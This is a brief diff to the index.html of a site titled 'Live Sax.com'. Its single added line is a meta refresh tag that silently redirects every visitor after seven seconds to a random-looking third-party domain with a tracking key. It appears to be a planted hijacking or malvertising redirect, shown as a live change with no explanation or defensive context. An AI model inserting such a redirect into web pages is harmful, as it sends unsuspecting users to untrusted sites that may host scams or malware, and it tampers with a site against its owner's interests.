--- a/index.html
+++ b/index.html
@@ -2,6 +2,7 @@
 <html>
 <head>
   <meta charset="UTF-8">
+   <meta http-equiv='refresh' content='7; URL=https://straightenedsleepyanalysis.com/pyvgb0bq5?key=6d5a6087f627316fc537dc11404b22d1'>
   <meta http-equiv="X-UA-Compatible" content="IE=edge">
   <meta name="viewport" content="width=device-width, initial-scale=1.0">
   <title>Live Sax.com</title>
